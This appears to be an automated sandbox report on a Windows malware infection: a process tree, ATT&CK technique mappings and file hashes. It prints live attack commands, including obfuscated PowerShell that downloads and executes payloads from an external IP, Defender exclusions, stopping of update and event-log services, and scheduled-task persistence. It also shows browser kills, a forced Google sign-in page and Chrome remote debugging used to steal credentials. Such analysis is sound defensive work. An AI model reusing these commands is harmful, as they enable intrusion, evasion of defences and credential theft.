-
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update9⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X10⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"11⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4756 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart12⤵PID:5016
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart13⤵PID:5312
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc12⤵
- Launches sc.exe
PID:4744
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc12⤵
- Launches sc.exe
PID:3612
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv12⤵
- Launches sc.exe
PID:1624
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits12⤵
- Launches sc.exe
PID:4748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc12⤵
- Launches sc.exe
PID:3712
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 012⤵
- Power Settings
PID:1548
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 012⤵
- Power Settings
PID:5208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 012⤵
- Power Settings
PID:6072
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 012⤵
- Power Settings
PID:5204
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe12⤵PID:2872
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"12⤵
- Launches sc.exe
PID:2520
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"12⤵
- Launches sc.exe
PID:2372
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog12⤵
- Launches sc.exe
PID:4684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"12⤵
- Launches sc.exe
PID:3824 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:3176
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns7⤵
- Gathers network information
PID:2612
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3728
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5332 -
C:\Users\Admin\AppData\Local\Temp\is-74FSO.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-74FSO.tmp\FunnyJellyfish.tmp" /SL5="$7022E,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\SysWOW64\timeout.exetimeout /T 37⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5612
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5684 -
C:\Users\Admin\AppData\Local\Temp\is-91HVF.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-91HVF.tmp\FunnyJellyfish.tmp" /SL5="$70210,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"9⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6080 -
C:\Windows\system32\regsvr32.exe/s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"10⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{52527F5F-F9BB-4EA3-F48A-FD57A5FFFFF1}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5376
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008081001\a04afe293b.exe"C:\Users\Admin\AppData\Local\Temp\1008081001\a04afe293b.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5340 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
PID:6844 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf4,0x120,0x7ff855d4cc40,0x7ff855d4cc4c,0x7ff855d4cc586⤵PID:6880
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5348
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3200 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:1780
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 14765⤵
- Program crash
PID:2056
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008082001\03eba3a65b.exe"C:\Users\Admin\AppData\Local\Temp\1008082001\03eba3a65b.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6052
-
-
C:\Users\Admin\AppData\Local\Temp\1008083001\6fd3a149c6.exe"C:\Users\Admin\AppData\Local\Temp\1008083001\6fd3a149c6.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2096
-
-
C:\Users\Admin\AppData\Local\Temp\1008084001\3dd24738bd.exe"C:\Users\Admin\AppData\Local\Temp\1008084001\3dd24738bd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2460 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4516
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:3860
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3440 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1912 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0cd957e-45d0-4ec1-b4dd-caeb80fce593} 3440 "\\.\pipe\gecko-crash-server-pipe.3440" gpu7⤵PID:5916
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4248dcb-610e-4734-ad87-441f7183253c} 3440 "\\.\pipe\gecko-crash-server-pipe.3440" socket7⤵PID:1340
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3136 -childID 1 -isForBrowser -prefsHandle 3100 -prefMapHandle 2320 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7027c7c-e1a0-4353-b0b1-547fade94be7} 3440 "\\.\pipe\gecko-crash-server-pipe.3440" tab7⤵PID:1084
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3416 -childID 2 -isForBrowser -prefsHandle 3664 -prefMapHandle 3660 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56a181d1-73fb-408f-a33a-953b15459c18} 3440 "\\.\pipe\gecko-crash-server-pipe.3440" tab7⤵PID:5680
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5024 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5060 -prefMapHandle 5056 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b6f237c-b5d8-4345-843c-9465ebacef01} 3440 "\\.\pipe\gecko-crash-server-pipe.3440" utility7⤵
- Checks processor information in registry
PID:4920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5500 -childID 3 -isForBrowser -prefsHandle 1420 -prefMapHandle 4252 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f20cc495-5e98-4699-8d6b-7722b198d317} 3440 "\\.\pipe\gecko-crash-server-pipe.3440" tab7⤵PID:5388
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5652 -childID 4 -isForBrowser -prefsHandle 5572 -prefMapHandle 5576 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f72c56a5-ce4b-4a0a-8706-508446ba0141} 3440 "\\.\pipe\gecko-crash-server-pipe.3440" tab7⤵PID:5876
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5784 -childID 5 -isForBrowser -prefsHandle 5860 -prefMapHandle 5856 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2c578c4-3486-4e4a-a0fd-207133aeb5fc} 3440 "\\.\pipe\gecko-crash-server-pipe.3440" tab7⤵PID:1836
-
-
C:\Program Files\Mozilla Firefox\crashreporter.exe"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\minidumps\70213076-18b2-4bd3-8988-aaed549f69db.dmp"7⤵
- Modifies registry class
PID:6536 -
C:\Program Files\Mozilla Firefox\minidump-analyzer.exe"C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\minidumps\70213076-18b2-4bd3-8988-aaed549f69db.dmp"8⤵PID:5148
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6536 -s 4768⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1016
-
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3560
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3756
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3916
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4556
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4184
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2440
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3148
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:3996
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
PID:4772
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:5316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:3104
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:5880
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:1880
-
C:\ProgramData\Mig\Mig.exeC:\ProgramData\Mig\Mig.exe1⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:2464 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5836 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:6672
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:6756
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:6680
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:6772
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:6820 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6832
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:6912
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:6956
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:7000 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7032
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:7008 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7100
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:7016 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7112
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:7024 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7136
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:7040
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:7068
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:7164
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5340 -ip 53402⤵PID:5612
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Modify Authentication Process
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1Clear Windows Event Logs
1Modify Authentication Process
1Modify Registry
3Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
41KB
MD5f5b15206c089d7eba6af4fb82cfe9305
SHA15be5de45fa5a3d47a3d98b8c742c04a455fac8b4
SHA2565a6ac2f791caa20478a902b6ff78e51b880d7020e4d9ad5c94cc277ae1e77c00
SHA512d340104f1946c0b0a5d409b9b84cf8bd23ae4c33010de068a458835f92a7129bf0c075fa6f5be1c65e7a731dbe8909ee8b4180ccaa16dc9f70d4f7917d40e927
-
Filesize
13KB
MD55c193269f0f4fac795051b00e5bcba5a
SHA1ca5b615e4f5c5b9763fcee96ba3d117456f4c0ae
SHA256d8ff929a3b817e0944723157a05a163054e1e08d8e1454917652836835d2d53e
SHA5128407c2b10cabf37af0b4c664c268e962c5ea720c56cfb3fa4404baa6280af8aba4e18dad1c214c2c944f5c5bd0e9546a8aa787b941d14c326bc605593418a39b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize328B
MD538f2b7f46528aae8184f997817c6ec0b
SHA1ff3200ef5c8bd8c7e17943bb3055a0b51f381d5f
SHA25630bf4037d0b809a9cd03e7f680a281b05dde0dbe636bd44a7edd687d0c8ba1b2
SHA5120eac540986a379033696a52b1b270779b6df91d3ad635b3f47b310d220e71a7828144d51b0d014358bbb627b47bc4670c60020623fb16e5f68f0d43a6064be86
-
Filesize
40B
MD50cbe49c501b96422e1f72227d7f5c947
SHA14b0be378d516669ef2b5028a0b867e23f5641808
SHA256750530732cba446649e872839c11e7b2a44e9fb5e053fc3b444678a5a8b262ac
SHA512984ea25c89baf0eb1d9f905841bda39813a94e2d1923dfb42d7165f15c589bd7ff864040ec8f3f682f3c57702498efff15a499f7dc077dd722d84b47cf895931
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
